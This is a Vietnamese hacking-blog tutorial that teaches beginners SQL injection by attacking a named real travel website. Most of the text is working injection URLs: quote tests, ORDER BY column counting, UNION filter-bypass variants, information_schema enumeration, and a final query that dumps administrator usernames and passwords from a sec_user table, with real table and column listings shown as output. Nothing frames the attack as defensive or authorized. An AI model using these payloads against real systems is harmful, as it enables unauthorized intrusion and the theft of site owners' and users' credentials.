• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

SQLi cơ bản dành cho newbie

AnonyViet by AnonyViet
10/12/2015 - Updated on 16/12/2020
in SQL Injection
Reading Time: 6 mins read
A A
3

Đề bài là hãy show user và pass của victim : canthotravel.vn bắt đầu nào
Step 1 : Thêm ‘ để kiểm tra xem site đó trả về như thế nào . ngoài cách thêm ‘ ta còn có thể sử dụng các cách khác như

PHP:
And 1=0
And 1=1
"
')
")

 

Các bài viết liên quan

sql injection shell

Sử dụng SQL Injection để chạy lệnh và chiếm quyền Shell

30/03/2022
sql injection

SQL Injection là gì? Làm thế nào để ngăn chặn lỗ hổng SQL Injection

16/05/2021
Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020
SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 2

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020

Ví dụ thực thế vào victim

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664'
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664')
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+and+1=0--+

 

Sau khi đã kiểm tra xong ta xác định site này dính lỗi SQLi vì nó bị mất hết nội dung
Step 2 : Ta lại tiếp tục kiếm các cột của nó có 2 cách để tìm được cột nó bằng

PHP:
ORDER BY 1-- -
GROUP BY 1-- -

 

Nó cũng khá là dễ nên không nói sâu vào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+50--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+1000--+

 

Tại sao lạ thế ta đã thử hết mà nó cũng không ra cột lỗi ta thử xét truy vấn đầu vào thêm ‘ sau id xem nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+6--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+5--+

 

Cột lỗi đã xuất hiện cột lỗi là 5
Step 3 : Ta tiếp tục dùng lệnh UNION SELECT để khai thác nó site này mình check thử trước rồi không cần phải bypass nhưng đối với 1 vài site khác cần bypass đoạn này thì các bạn cứ áp dụng các cách bypass 403 404

PHP:
/*!UNION*/ SELECT
/*!UNION SELECT */
UNION /*!SELECT */
/*!50000UNION*/ /*!50000SELECT */
UnIoN SeLeCT
UNION /*!50000SELECT*/

 

Còn nhiều nữa nhưng bạn cứ thử các cách trên là để bypass cơ bản nhất tiếp tục nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+union+select+1,2,3,4,5--+

 

Vẫn không xuất hiện gì bây giờ ta cũng có 2 cách 1 là ta thêm – trước id= ví dụ id=-1 cách 2 là ta thay thế id= là NULL ví dụ id=NULL

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=-1387986664%27+union+select+1,2,3,4,5--+
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,4,5--+

 

Số xuất hiện là 2 và 4 ở đây tôi chọn số 4
Step 4 : Bây giờ tới đây ta chèn vào ngay vị trí của số 4 như sau

GROUP_CONCAT(TABLE_NAME)

và sau cùng ta thêm

FROM information_tables WHERE table_schema=database()– –

để có thể khai thác được table name của web đó

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(TABLE_NAME),5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--+

 

Phù lúc này ta có được các table sau

binhluan,category,categoryl,cauhinh,cauhinhsanpham,chitietdatphong,chitietdatthucdon,chucnang,configmail,ctydulich,danhgiadoanhnghiep,datphong,dattours,feedrss,help,hinhthucdongia,hoidap,hotrott,huyen,huyenl,infoweb,khachhang,khachsan,khachsanl,khuvuc,khuyenmai,languages,lienhe,lkweb,loaihinhdulich,loaihinhdulichl,loaiphong,loaiphongl,loaiphongt,loaiphongtt,loaitin,loaitinl,loaitour,media,nhomtin,nhomtinl,noinhan,product,productl,quangcao,quanly,quocgia,sec_audit_fld,sec_audit_logon_errors,sec_audit_session,sec_audit_transaction,sec_host,sec_language,sec_module,sec_module_form,sec_module_list,sec_page,sec_role,sec_role_task,sec_session,sec_site,sec_site_language,sec_site_them,sec_system,sec_system_host,sec_task,sec_trans_cat,sec_trans_unit,sec_user,sec_vfs,sec_vfs_data,site_counter,support_online,support_online_group,thanhvien,thucdon,tieuchuan,tieuchuanl,tinh,tinhl,tinnhan,tintuc,tintucl,tours,toursl,trangthai,yeucaukhac

Chà khá là nhiều ta không quan tâm đề kêu là kiếm admin ta xem sơ qua và thấy sec_user ta chọn table này và tiếp tục khai thác nó
Step 5 : Ta sử dụng query cũng giông như step 4 nhưng ta lại thay đổi chữ table_name thành column_name và table_schema=database thành table_name=Mã hex table

GROUP_CONCAT(COLUMN_NAME)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=MÃ HEX TABLE

Mã hex table có nghĩ là bạn phải hex cái table mà bạn chọn có nhiều website hỗ trợ tính năng hex thậm chí ngay cả firefox bạn cũng có thể web hỗ trợ

http://www.convertstring.com/vi/EncodeDecode/HexEncode

Ở đây ta chọn table sec_user nên hex nó => 0x7365635f75736572 nhớ phải thêm 0x trước mã hex
câu lênh hoàn chỉnh

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(COLUMN_NAME),5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7365635f75736572--+

 

kết quả nhận được là

user_id,username,role_id,user_code,user_password,salt,algorithm,firstname,lastname,email,phone,user_desc,created_by,created_at,updated_at,updated_by,ip_address,start_date,end_date,login_date,login_time,pwd_chg_date,pwd_chg_time,pwd_count,in_use,is_active,company_id

Step 6 : Ok đã có đầy đủ .. Table : Sec_user ; data column là : username và user_password ta tiến hành bước cuối nào

GROUP_CONCAT(USERNAME,0X7C,USER_PASSWORD)
+FROM+sec_user–+

áp dụng vào site

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=null%27+union+select+1,2,3,group_concat(username,0x7c,user_password),5+from+sec_user--+

 

Hehe xong bài :) Cảm ơn các bạn đã xem

Tags: sql injectionsqli
Previous Post

SỬA LỖI START MENU CỦA WIN 10 KHÔNG HOẠT ĐỘNG

Next Post

Cách tìm IP của web dùng Cloudflare

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

sql injection shell
SQL Injection

Sử dụng SQL Injection để chạy lệnh và chiếm quyền Shell

30/03/2022
Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8
SQL Injection

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020
SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 3
SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020
Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống. 9
SQL Injection

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017 - Updated on 16/12/2020
SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
SQL Injection

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015 - Updated on 16/12/2020
Dork SQL 2015
SQL Injection

Dork SQL 2015

21/12/2015 - Updated on 16/12/2020
Next Post
Cách tìm IP của web dùng Cloudflare

Cách tìm IP của web dùng Cloudflare

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

3 Comments
oldest
newest
Inline Feedbacks
View all comments
Lâm Trung Tính
Lâm Trung Tính
4 years ago

Mình vào web mà soa nó cứ báo là ”Làm ơn hãy bật JavaSqrit” là sao ad

Reply
Lâm Trung Tính
Lâm Trung Tính
4 years ago

Bài viết này rất có ích cho newbie thanks ad rất nhiều :V

Reply
Hisoka
Hisoka
4 years ago

Yêu đấy :3

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

5 Website giúp bạn tìm chủ tài khoản Email là ai 4

5 Website giúp bạn tìm chủ tài khoản Email là ai

24/05/2022
godeal24

Giá bản quyền Windows 10 chỉ 5.71$, miễn phí nâng cấp lên Windows 11

23/05/2022
Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn 5

Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn

23/05/2022
coupon dmca

Cách bảo vệ bản quyền Website với DMCA – Coupon nâng cấp Pro giảm 50%

23/05/2022
hosting azdigi

Đánh giá gói Turbo Business Hosting của AZDIGI

22/05/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Bài viết mới

  • 5 Website giúp bạn tìm chủ tài khoản Email là ai
  • Giá bản quyền Windows 10 chỉ 5.71$, miễn phí nâng cấp lên Windows 11
  • Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn
  • Cách bảo vệ bản quyền Website với DMCA – Coupon nâng cấp Pro giảm 50%
  • Đánh giá gói Turbo Business Hosting của AZDIGI
  • 5 vụ lừa đảo nguy hiểm nhất trên không gian mạng

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 567LIVE MMLive SP666 92lottery sun86 stackoverflow

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 567LIVE MMLive SP666 92lottery sun86 stackoverflow

wpDiscuz
pixel